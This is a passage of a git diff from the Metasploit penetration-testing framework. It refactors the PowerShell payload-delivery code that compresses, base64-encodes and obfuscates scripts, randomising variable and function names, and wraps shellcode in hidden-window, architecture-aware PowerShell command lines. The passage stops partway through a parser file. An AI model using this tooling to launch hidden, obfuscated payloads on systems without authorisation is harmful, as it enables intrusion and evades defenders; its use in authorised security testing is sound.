diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index c42418288339..c45e002274d0 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -1,178 +1,380 @@
 # -*- coding: binary -*-
-require 'zlib'
+require 'rex/exploitation/powershell'
 
 module Msf
 module Exploit::Powershell
+  PowershellScript = Rex::Exploitation::Powershell::Script
 
   def initialize(info = {})
     super
-    register_options(
-    [
-        OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
-        OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
-        OptBool.new('RUN_WOW64', [
-          true,
-          'Execute powershell in 32bit compatibility mode, payloads need native arch',
-          false
-            ]),
+    register_advanced_options(
+      [
+        OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
+        OptInt.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
+        OptBool.new('Powershell::strip_comments', [true, 'Strip comments', true]),
+        OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
+        OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
+        OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
+        OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w(net reflection old msil)]),
       ], self.class)
   end
 
   #
-  # Insert substitutions into the powershell script
+  # Return an encoded powershell script
+  # Will invoke PSH modifiers as enabled
   #
-  def make_subs(script, subs)
-    if ::File.file?(script)
-      script = ::File.read(script)
+  # @param script_in [String] Script contents
+  #
+  # @return [String] Encoded script
+  def encode_script(script_in)
+    # Build script object
+    psh = PowershellScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select { |k, v| k =~ /^Powershell::(strip|sub)/ and v }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
     end
 
-    subs.each do |set|
-      script.gsub!(set[0],set[1])
-    end
-    if datastore['VERBOSE']
-      print_good("Final Script: ")
-      script.each_line {|l| print_status("\t#{l}")}
-    end
-    return script
+    psh.encode_code
   end
 
   #
-  # Return an array of substitutions for use in make_subs
+  # Return a gzip compressed powershell script
+  # Will invoke PSH modifiers as enabled
   #
-  def process_subs(subs)
-    return [] if subs.nil? or subs.empty?
-    new_subs = []
-    subs.split(';').each do |set|
-      new_subs << set.split(',', 2)
+  # @param script_in [String] Script contents
+  # @param eof [String] Marker to indicate the end of file appended to script
+  #
+  # @return [String] Compressed script with decompression stub
+  def compress_script(script_in, eof = nil)
+    # Build script object
+    psh = PowershellScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select { |k, v| k =~ /^Powershell::(strip|sub)/ and v }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
     end
-    return new_subs
+
+    psh.compress_code(eof)
   end
 
   #
-  # Read in a powershell script stored in +script+
+  # Generate a powershell command line, options are passed on to
+  # generate_psh_args
   #
-  def read_script(script)
-    script_in = ''
-    begin
-      # Open script file for reading
-      fd = ::File.new(script, 'r')
-      while (line = fd.gets)
-        script_in << line
-      end
+  # @param opts [Hash] The options to generate the command line
+  # @option opts [String] :path Path to the powershell binary
+  # @option opts [Boolean] :no_full_stop Whether powershell binary
+  #   should include .exe
+  #
+  # @return [String] Powershell command line with arguments
+  def generate_psh_command_line(opts)
+    if opts[:path] and (opts[:path][-1, 1] != '\\')
+      opts[:path] << '\\'
+    end
 
-      # Close open file
-      fd.close()
-    rescue Errno::ENAMETOOLONG, Errno::ENOENT
-      # Treat script as a... script
-      script_in = script
+    if opts[:no_full_stop]
+      binary = 'powershell'
+    else
+      binary = 'powershell.exe'
     end
-    return script_in
-  end
 
+    args = generate_psh_args(opts)
+
+    "#{opts[:path]}#{binary} #{args}"
+  end
 
   #
-  # Return a zlib compressed powershell script
+  # Generate arguments for the powershell command
+  # The format will be have no space at the start and have a space
+  # afterwards e.g. "-Arg1 x -Arg -Arg x "
   #
-  def compress_script(script_in, eof = nil)
+  # @param opts [Hash] The options to generate the command line
+  # @option opts [Boolean] :shorten Whether to shorten the powershell
+  #   arguments (v2.0 or greater)
+  # @option opts [String] :encodedcommand Powershell script as an
+  #   encoded command (-EncodedCommand)
+  # @option opts [String] :executionpolicy The execution policy
+  #   (-ExecutionPolicy)
+  # @option opts [String] :inputformat The input format (-InputFormat)
+  # @option opts [String] :file The path to a powershell file (-File)
+  # @option opts [Boolean] :noexit Whether to exit powershell after
+  #   execution (-NoExit)
+  # @option opts [Boolean] :nologo Whether to display the logo (-NoLogo)
+  # @option opts [Boolean] :noninteractive Whether to load a non
+  #   interactive powershell (-NonInteractive)
+  # @option opts [Boolean] :mta Whether to run as Multi-Threaded
+  #   Apartment (-Mta)
+  # @option opts [String] :outputformat The output format
+  #   (-OutputFormat)
+  # @option opts [Boolean] :sta Whether to run as Single-Threaded
+  #   Apartment (-Sta)
+  # @option opts [Boolean] :noprofile Whether to use the current users
+  #   powershell profile (-NoProfile)
+  # @option opts [String] :windowstyle The window style to use
+  #   (-WindowStyle)
+  #
+  # @return [String] Powershell command arguments
+  def generate_psh_args(opts)
+    return '' unless opts
+
+    unless opts.key? :shorten
+      opts[:shorten] = (datastore['Powershell::method'] != 'old')
+    end
+
+    arg_string = ' '
+    opts.each_pair do |arg, value|
+      case arg
+      when :encodedcommand
+        arg_string << "-EncodedCommand #{value} " if value
+      when :executionpolicy
+        arg_string << "-ExecutionPolicy #{value} " if value
+      when :inputformat
+        arg_string << "-InputFormat #{value} " if value
+      when :file
+        arg_string << "-File #{value} " if value
+      when :noexit
+        arg_string << '-NoExit ' if value
+      when :nologo
+        arg_string << '-NoLogo ' if value
+      when :noninteractive
+        arg_string << '-NonInteractive ' if value
+      when :mta
+        arg_string << '-Mta ' if value
+      when :outputformat
+        arg_string << "-OutputFormat #{value} " if value
+      when :sta
+        arg_string << '-Sta ' if value
+      when :noprofile
+        arg_string << '-NoProfile ' if value
+      when :windowstyle
+        arg_string << "-WindowStyle #{value} " if  value
+      end
+    end
 
-    # Compress using the Deflate algorithm
-    compressed_stream = ::Zlib::Deflate.deflate(script_in,
-      ::Zlib::BEST_COMPRESSION)
-
-    # Base64 encode the compressed file contents
-    encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-    # Build the powershell expression
-    # Decode base64 encoded command and create a stream object
-    psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-    psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
-    # Read & delete the first two bytes due to incompatibility with MS
-    psh_expression << "$stream.ReadByte()|Out-Null;"
-    psh_expression << "$stream.ReadByte()|Out-Null;"
-    # Uncompress and invoke the expression (execute)
-    psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
-    psh_expression << "$(New-Object IO.Compression.DeflateStream("
-    psh_expression << "$stream,"
-    psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-    psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-    # If eof is set, add a marker to signify end of script output
-    if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-
-    # Convert expression to unicode
-    unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-    # Base64 encode the unicode expression
-    encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-    return encoded_expression
+    # Command must be last (unless from stdin - etc)
+    if opts[:command]
+      arg_string << "-Command #{opts[:command]}"
+    end
+
+    # Shorten arg if PSH 2.0+
+    if opts[:shorten]
+      # Invoke-Command and Out-File require these options to have
+      # an additional space before to prevent Powershell code being
+      # mangled.
+      arg_string.gsub!(' -Command ', ' -c ')
+      arg_string.gsub!('-EncodedCommand ', '-e ')
+      arg_string.gsub!('-ExecutionPolicy ', '-ep ')
+      arg_string.gsub!(' -File ', ' -f ')
+      arg_string.gsub!('-InputFormat ', '-i ')
+      arg_string.gsub!('-NoExit ', '-noe ')
+      arg_string.gsub!('-NoLogo ', '-nol ')
+      arg_string.gsub!('-NoProfile ', '-nop ')
+      arg_string.gsub!('-NonInteractive ', '-noni ')
+      arg_string.gsub!('-OutputFormat ', '-o ')
+      arg_string.gsub!('-Sta ', '-s ')
+      arg_string.gsub!('-WindowStyle ', '-w ')
+    end
+
+    # Strip off first space character
+    arg_string = arg_string[1..-1]
+    # Remove final space character
+    arg_string = arg_string[0..-2] if (arg_string[-1] == ' ')
+
+    arg_string
   end
 
   #
-  # Runs powershell in hidden window raising interactive proc msg
+  # Wraps the powershell code to launch a hidden window and
+  # detect the execution environment and spawn the appropriate
+  # powershell executable for the payload architecture.
   #
-  def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
+  # @param ps_code [String] Powershell code
+  # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
+  # @param encoded [Boolean] Indicates whether ps_code is encoded or not
+  #
+  # @return [String] Wrapped powershell code
+  def run_hidden_psh(ps_code, payload_arch, encoded)
+    arg_opts = {
+      noprofile: true,
+      windowstyle: 'hidden',
+    }
+
+    if encoded
+      arg_opts[:encodedcommand] = ps_code
+    else
+      arg_opts[:command] = ps_code.gsub("'", "''")
+    end
+
+    # Old technique fails if powershell exits..
+    arg_opts[:noexit] = true if datastore['Powershell::method'] == 'old'
 
-    ps_wrapper = <<EOS
-$si = New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName = #{ps_bin}
-$si.Arguments = '#{ps_args}'
-$si.UseShellExecute = $false
-$si.RedirectStandardOutput = $true
-$si.WindowStyle = 'Hidden'
-$si.CreateNoWindow = $True
-$p = [System.Diagnostics.Process]::Start($si)
+    ps_args = generate_psh_args(arg_opts)
+
+    process_start_info = <<EOS
+$s=New-Object System.Diagnostics.ProcessStartInfo
+$s.FileName=$b
+$s.Arguments='#{ps_args}'
+$s.UseShellExecute=$false
+$p=[System.Diagnostics.Process]::Start($s)
 EOS
+    process_start_info.gsub!("\n", ';')
 
-    return ps_wrapper
+    archictecure_detection = <<EOS
+if([IntPtr]::Size -eq 4){
+#{payload_arch == 'x86' ? "$b='powershell.exe'" : "$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'"}
+}else{
+#{payload_arch == 'x86' ? "$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" : "$b='powershell.exe'"}
+};
+EOS
+
+    archictecure_detection.gsub!("\n", '')
+
+    archictecure_detection + process_start_info
   end
 
   #
-  # Creates cmd script to execute psh payload
+  # Creates a powershell command line string which will execute the
+  # payload in a hidden window in the appropriate execution environment
+  # for the payload architecture. Opts are passed through to
+  # run_hidden_psh, generate_psh_command_line and generate_psh_args
   #
-  def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'], wow64=datastore['RUN_WOW64'])
-    # Allow powershell 1.0 format
-    if old_psh
-      psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
+  # @param pay [String] The payload shellcode
+  # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
+  # @param opts [Hash] The options to generate the command
+  # @option opts [Boolean] :persist Loop the payload to cause
+  #   re-execution if the shellcode finishes
+  # @option opts [Integer] :prepend_sleep Sleep for the specified time
+  #   before executing the payload
+  # @option opts [String] :method The powershell injection technique to
+  #   use: 'net'/'reflection'/'old'
+  # @option opts [Boolean] :encode_inner_payload Encodes the powershell
+  #   script within the hidden/architecture detection wrapper
+  # @option opts [Boolean] :encode_final_payload Encodes the final
+  #   powershell script
+  # @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
+  #   environment variable at the start of the command line
+  # @option opts [Boolean] :use_single_quotes Wraps the -Command
+  #   argument in single quotes unless :encode_final_payload
+  #
+  # @return [String] Powershell command line with payload
+  def cmd_psh_payload(pay, payload_arch, opts = {})
+    opts[:persist] ||= datastore['Powershell::persist']
+    opts[:prepend_sleep] ||= datastore['Powershell::prepend_sleep']
+    opts[:method] ||= datastore['Powershell::method']
+
+    if opts[:encode_inner_payload] && opts[:encode_final_payload]
+      fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
+    end
+
+    if opts[:no_equals] && !opts[:encode_final_payload]
+      fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
+    end
+
+    psh_payload = case opts[:method]
+    when 'net'
+      Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    when 'reflection'
+      Msf::Util::EXE.to_win32pe_psh_reflection(framework, pay)
+    when 'old'
+      Msf::Util::EXE.to_win32pe_psh(framework, pay)
+    when 'msil'
+      fail RuntimeError, 'MSIL Powershell method no longer exists'
     else
-      psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+      fail RuntimeError, 'No Powershell method specified'
     end
+
     # Run our payload in a while loop
-    if datastore['PERSIST']
-      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-      sleep_time = rand(5)+5
+    if opts[:persist]
+      fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
+      sleep_time = rand(5) + 5
+      vprint_status("Sleep time set to #{sleep_time} seconds")
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
-    # Determine appropriate architecture
-    ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
-    # Wrap in hidden runtime
-    psh_payload = run_hidden_psh(psh_payload,ps_bin)
-    # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
-  end
 
-  #
-  # Convert binary to byte array, read from file if able
-  #
-  def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-    code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-    code = code.unpack('C*')
-    psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-    lines = []
-    1.upto(code.length-1) do |byte|
-      if(byte % 10 == 0)
-        lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+    if opts[:prepend_sleep]
+      if opts[:prepend_sleep].to_i > 0
+        psh_payload = "Start-Sleep -s #{opts[:prepend_sleep]};" << psh_payload
       else
-        lines.push ",0x#{code[byte].to_s(16)}"
+        vprint_error('Sleep time must be greater than 0 seconds')
       end
     end
-    psh << lines.join("") + "\r\n"
-  end
 
+    compressed_payload = compress_script(psh_payload)
+    encoded_payload = encode_script(psh_payload)
 
+    # This branch is probably never taken...
+    if encoded_payload.length <= compressed_payload.length
+      smallest_payload = encoded_payload
+      encoded = true
+    else
+      if opts[:encode_inner_payload]
+        encoded = true
+        compressed_encoded_payload = encode_script(compressed_payload)
+
+        if encoded_payload.length <= compressed_encoded_payload.length
+          smallest_payload = encoded_payload
+        else
+          smallest_payload = compressed_encoded_payload
+        end
+      else
+        smallest_payload = compressed_payload
+        encoded = false
+      end
+    end
 
+    # Wrap in hidden runtime / architecture detection
+    final_payload = run_hidden_psh(smallest_payload, payload_arch, encoded)
+
+    command_args = {
+      noprofile: true,
+      windowstyle: 'hidden'
+    }.merge(opts)
+
+    if opts[:encode_final_payload]
+      command_args[:encodedcommand] = encode_script(final_payload)
+
+      # If '=' is a bad character pad the payload until Base64 encoded
+      # payload contains none.
+      if opts[:no_equals]
+        while command_args[:encodedcommand].include? '='
+          final_payload << ' '
+          command_args[:encodedcommand] = encode_script(final_payload)
+        end
+      end
+    else
+      if opts[:use_single_quotes]
+        # Escape Single Quotes
+        final_payload.gsub!("'", "''")
+        # Wrap command in quotes
+        final_payload = "'#{final_payload}'"
+      end
+
+      command_args[:command] = final_payload
+    end
+
+    psh_command = generate_psh_command_line(command_args)
+
+    if opts[:remove_comspec]
+      command = psh_command
+    else
+      command = "%COMSPEC% /b /c start /min #{psh_command}"
+    end
+
+    vprint_status("Powershell command length: #{command.length}")
+    if command.length > 8191
+      fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
+    end
+
+    command
+  end
+
+  #
+  # Useful method cache
+  #
+  module PshMethods
+    include Rex::Exploitation::Powershell::PshMethods
+  end
 end
 end
-
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 4b657cc190ed..1e5dbaf5289c 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1084,17 +1084,18 @@ def self.to_mem_aspx(framework, code, exeopts={})
   end
 
   def self.to_win32pe_psh_net(framework, code, opts={})
-    hash_sub = {}
-    hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_kernel32] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_baseaddr] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_threadHandle] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_output] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_temp] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_codeProvider] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_compileParams] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:var_code)
+    rig.init_var(:var_kernel32)
+    rig.init_var(:var_baseaddr)
+    rig.init_var(:var_threadHandle)
+    rig.init_var(:var_output)
+    rig.init_var(:var_codeProvider)
+    rig.init_var(:var_compileParams)
+    rig.init_var(:var_syscode)
+    rig.init_var(:var_temp)
 
+    hash_sub = rig.to_h
     hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
 
     return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
new file mode 100644
index 000000000000..bfc42e900157
--- /dev/null
+++ b/lib/rex/exploitation/powershell.rb
@@ -0,0 +1,62 @@
+# -*- coding: binary -*-
+
+require 'rex/exploitation/powershell/output'
+require 'rex/exploitation/powershell/parser'
+require 'rex/exploitation/powershell/obfu'
+require 'rex/exploitation/powershell/param'
+require 'rex/exploitation/powershell/function'
+require 'rex/exploitation/powershell/script'
+require 'rex/exploitation/powershell/psh_methods'
+
+module Rex
+  module Exploitation
+    module Powershell
+      #
+      # Reads script into a PowershellScript
+      #
+      # @param script_path [String] Path to the Script File
+      #
+      # @return [Script] Powershell Script object
+      def self.read_script(script_path)
+        Rex::Exploitation::Powershell::Script.new(script_path)
+      end
+
+      #
+      # Insert substitutions into the powershell script
+      # If script is a path to a file then read the file
+      # otherwise treat it as the contents of a file
+      #
+      # @param script [String] Script file or path to script
+      # @param subs [Array] Substitutions to insert
+      #
+      # @return [String] Modified script file
+      def self.make_subs(script, subs)
+        if ::File.file?(script)
+          script = ::File.read(script)
+        end
+
+        subs.each do |set|
+          script.gsub!(set[0], set[1])
+        end
+
+        script
+      end
+
+      #
+      # Return an array of substitutions for use in make_subs
+      #
+      # @param subs [String] A ; seperated list of substitutions
+      #
+      # @return [Array] An array of substitutions
+      def self.process_subs(subs)
+        return [] if subs.nil? or subs.empty?
+        new_subs = []
+        subs.split(';').each do |set|
+          new_subs << set.split(',', 2)
+        end
+
+        new_subs
+      end
+    end
+  end
+end
diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
new file mode 100644
index 000000000000..1792be96a61d
--- /dev/null
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -0,0 +1,63 @@
+# -*- coding: binary -*-
+
+module Rex
+module Exploitation
+module Powershell
+  class Function
+    FUNCTION_REGEX = Regexp.new(/\[(\w+\[\])\]\$(\w+)\s?=|\[(\w+)\]\$(\w+)\s?=|\[(\w+\[\])\]\s+?\$(\w+)\s+=|\[(\w+)\]\s+\$(\w+)\s?=/i)
+    PARAMETER_REGEX = Regexp.new(/param\s+\(|param\(/im)
+    attr_accessor :code, :name, :params
+
+    include Output
+    include Parser
+    include Obfu
+
+    def initialize(name, code)
+      @name = name
+      @code = code
+      populate_params
+    end
+
+    #
+    # To String
+    #
+    # @return [String] Powershell function
+    def to_s
+      "function #{name} #{code}"
+    end
+
+    #
+    # Identify the parameters from the code and
+    # store as Param in @params
+    #
+    def populate_params
+      @params = []
+      start = code.index(PARAMETER_REGEX)
+      return unless start
+      # Get start of our block
+      idx = scan_with_index('(', code[start..-1]).first.last + start
+      pclause = block_extract(idx)
+
+      matches = pclause.scan(FUNCTION_REGEX)
+
+      # Ignore assignment, create params with class and variable names
+      matches.each do |param|
+        klass = nil
+        name = nil
+        param.each do |value|
+          if value
+            if klass
+              name = value
+              @params << Param.new(klass, name)
+              break
+            else
+              klass = value
+            end
+          end
+        end
+      end
+    end
+  end
+end
+end
+end
diff --git a/lib/rex/exploitation/powershell/obfu.rb b/lib/rex/exploitation/powershell/obfu.rb
new file mode 100644
index 000000000000..c459a3bfa733
--- /dev/null
+++ b/lib/rex/exploitation/powershell/obfu.rb
@@ -0,0 +1,98 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+
+module Rex
+module Exploitation
+module Powershell
+  module Obfu
+    MULTI_LINE_COMMENTS_REGEX = Regexp.new(/<#(.*?)#>/m)
+    SINGLE_LINE_COMMENTS_REGEX = Regexp.new(/^\s*#(?!.*region)(.*$)/i)
+    WINDOWS_EOL_REGEX = Regexp.new(/[\r\n]+/)
+    UNIX_EOL_REGEX = Regexp.new(/[\n]+/)
+    WHITESPACE_REGEX = Regexp.new(/\s+/)
+    EMPTY_LINE_REGEX = Regexp.new(/^$|^\s+$/)
+
+    #
+    # Remove comments
+    #
+    # @return [String] code without comments
+    def strip_comments
+      # Multi line
+      code.gsub!(MULTI_LINE_COMMENTS_REGEX, '')
+      # Single line
+      code.gsub!(SINGLE_LINE_COMMENTS_REGEX, '')
+
+      code
+    end
+
+    #
+    # Remove empty lines
+    #
+    # @return [String] code without empty lines
+    def strip_empty_lines
+      # Windows EOL
+      code.gsub!(WINDOWS_EOL_REGEX, "\r\n")
+      # UNIX EOL
+      code.gsub!(UNIX_EOL_REGEX, "\n")
+
+      code
+    end
+
+    #
+    # Remove whitespace
+    # This can break some codes using inline .NET
+    #
+    # @return [String] code with whitespace stripped
+    def strip_whitespace
+      code.gsub!(WHITESPACE_REGEX, ' ')
+
+      code
+    end
+
+    #
+    # Identify variables and replace them
+    #
+    # @return [String] code with variable names replaced with unique values
+    def sub_vars
+      # Get list of variables, remove reserved
+      get_var_names.each do |var, _sub|
+        code.gsub!(var, "$#{@rig.init_var(var)}")
+      end
+
+      code
+    end
+
+    #
+    # Identify function names and replace them
+    #
+    # @return [String] code with function names replaced with unique
+    #   values
+    def sub_funcs
+      # Find out function names, make map
+      get_func_names.each do |var, _sub|
+        code.gsub!(var, @rig.init_var(var))
+      end
+
+      code
+    end
+
+    #
+    # Perform standard substitutions
+    #
+    # @return [String] code with standard substitution methods applied
+    def standard_subs(subs = %w(strip_comments strip_whitespace sub_funcs sub_vars))
+      # Save us the trouble of breaking injected .NET and such
+      subs.delete('strip_whitespace') unless get_string_literals.empty?
+      # Run selected modifiers
+      subs.each do |modifier|
+        send(modifier)
+      end
+      code.gsub!(EMPTY_LINE_REGEX, '')
+
+      code
+    end
+  end # Obfu
+end
+end
+end
diff --git a/lib/rex/exploitation/powershell/output.rb b/lib/rex/exploitation/powershell/output.rb
new file mode 100644
index 000000000000..ea42c1770b62
--- /dev/null
+++ b/lib/rex/exploitation/powershell/output.rb
@@ -0,0 +1,151 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+module Powershell
+  module Output
+    #
+    # To String
+    #
+    # @return [String] Code
+    def to_s
+      code
+    end
+
+    #
+    # Returns code size
+    #
+    # @return [Integer] Code size
+    def size
+      code.size
+    end
+
+    #
+    # Return code with numbered lines
+    #
+    # @return [String] Powershell code with line numbers
+    def to_s_lineno
+      numbered = ''
+      code.split(/\r\n|\n/).each_with_index do |line, idx|
+        numbered << "#{idx}: #{line}"
+      end
+
+      numbered
+    end
+
+    #
+    # Return a zlib compressed powershell code wrapped in decode stub
+    #
+    # @param eof [String] End of file identifier to append to code
+    #
+    # @return [String] Zlib compressed powershell code wrapped in
+    # decompression stub
+    def deflate_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = ::Zlib::Deflate.deflate(code,
+                                                  ::Zlib::BEST_COMPRESSION)
+
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  '$s=New-Object IO.MemoryStream(,'
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
+      # Read & delete the first two bytes due to incompatibility with MS
+      psh_expression << '$s.ReadByte();'
+      psh_expression << '$s.ReadByte();'
+      # Uncompress and invoke the expression (execute)
+      psh_expression << 'IEX (New-Object IO.StreamReader('
+      psh_expression << 'New-Object IO.Compression.DeflateStream('
+      psh_expression << '$s,'
+      psh_expression << '[IO.Compression.CompressionMode]::Decompress)'
+      psh_expression << ')).ReadToEnd();'
+
+      # If eof is set, add a marker to signify end of code output
+      # if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
+
+      @code = psh_expression
+    end
+
+    #
+    # Return Base64 encoded powershell code
+    #
+    # @return [String] Base64 encoded powershell code
+    def encode_code
+      @code = Rex::Text.encode_base64(Rex::Text.to_unicode(code))
+    end
+
+    #
+    # Return a gzip compressed powershell code wrapped in decoder stub
+    #
+    # @param eof [String] End of file identifier to append to code
+    #
+    # @return [String] Gzip compressed powershell code wrapped in
+    # decompression stub
+    def gzip_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = Rex::Text.gzip(code)
+
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  '$s=New-Object IO.MemoryStream(,'
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << 'IEX (New-Object IO.StreamReader('
+      psh_expression << 'New-Object IO.Compression.GzipStream('
+      psh_expression << '$s,'
+      psh_expression << '[IO.Compression.CompressionMode]::Decompress)'
+      psh_expression << ')).ReadToEnd();'
+
+      # If eof is set, add a marker to signify end of code output
+      # if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
+
+      @code = psh_expression
+    end
+
+    #
+    # Compresses script contents with gzip (default) or deflate
+    #
+    # @param eof [String] End of file identifier to append to code
+    # @param gzip [Boolean] Whether to use gzip compression or deflate
+    #
+    # @return [String] Compressed code wrapped in decompression stub
+    def compress_code(eof = nil, gzip = true)
+      @code = gzip ? gzip_code(eof) : deflate_code(eof)
+    end
+
+    #
+    # Reverse the compression process
+    # Try gzip, inflate if that fails
+    #
+    # @return [String] Decompressed powershell code
+    def decompress_code
+      # Extract substring with payload
+      encoded_stream = @code.scan(/FromBase64String\('(.*)'/).flatten.first
+      # Decode and decompress the string
+      unencoded = Rex::Text.decode_base64(encoded_stream)
+      begin
+        @code = Rex::Text.ungzip(unencoded) || Rex::Text.zlib_inflate(unencoded)
+      rescue Zlib::GzipFile::Error
+        begin
+          @code = Rex::Text.zlib_inflate(unencoded)
+        rescue Zlib::DataError => e
+          raise RuntimeError, 'Invalid compression'
+        end
+      end
+
+      @code
+    end
+  end
+end
+end
+end
diff --git a/lib/rex/exploitation/powershell/param.rb b/lib/rex/exploitation/powershell/param.rb
new file mode 100644
index 000000000000..96a4e54480c8
--- /dev/null
+++ b/lib/rex/exploitation/powershell/param.rb
@@ -0,0 +1,23 @@
+# -*- coding: binary -*-
+
+module Rex
+module Exploitation
+module Powershell
+  class Param
+    attr_accessor :klass, :name
+    def initialize(klass, name)
+      @klass = klass.strip
+      @name = name.strip.gsub(/\s|,/, '')
+    end
+
+    #
+    # To String
+    #
+    # @return [String] Powershell param
+    def to_s
+      "[#{klass}]$#{name}"
+    end
+  end
+end
+end
+end
diff --git a/lib/rex/exploitation/powershell/parser.rb b/lib/rex/exploitation/powershell/parser.rb
new file mode 100644
index 000000000000..9304403f479e
--- /dev/null
+++ b/lib/rex/exploitation/powershell/parser.rb
@@ -0,0 +1,183 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Exploitation
+    module Powershell
+      module Parser
+        # Reserved special variables
+        # Acquired with: Get-Variable | Format-Table name, value -auto
+        RESERVED_VARIABLE_NAMES = [
+          '$$',
+          '$?',
+          '$^',
+          '$_',
+          '$args',
+          '$ConfirmPreference',
+          '$ConsoleFileName',
+          '$DebugPreference',
+          '$Env',
+          '$Error',
+          '$ErrorActionPreference',
+          '$ErrorView',
+          '$ExecutionContext',
+          '$false',
+          '$FormatEnumerationLimit',
+          '$HOME',
+          '$Host',
+          '$input',
+          '$LASTEXITCODE',
+          '$MaximumAliasCount',
+          '$MaximumDriveCount',
+          '$MaximumErrorCount',
+          '$MaximumFunctionCount',
+          '$MaximumHistoryCount',
+          '$MaximumVariableCount',
+          '$MyInvocation',
+          '$NestedPromptLevel',
+          '$null',
+          '$OutputEncoding',
+          '$PID',
+          '$PROFILE',
+          '$ProgressPreference',
+          '$PSBoundParameters',
+          '$PSCulture',
+          '$PSEmailServer',
+          '$PSHOME',
+          '$PSSessionApplicationName',
+          '$PSSessionConfigurationName',
+          '$PSSessionOption',
+          '$PSUICulture',
+          '$PSVersionTable',
+          '$PWD',
+          '$ReportErrorShowExceptionClass',
+          '$ReportErrorShowInnerException',
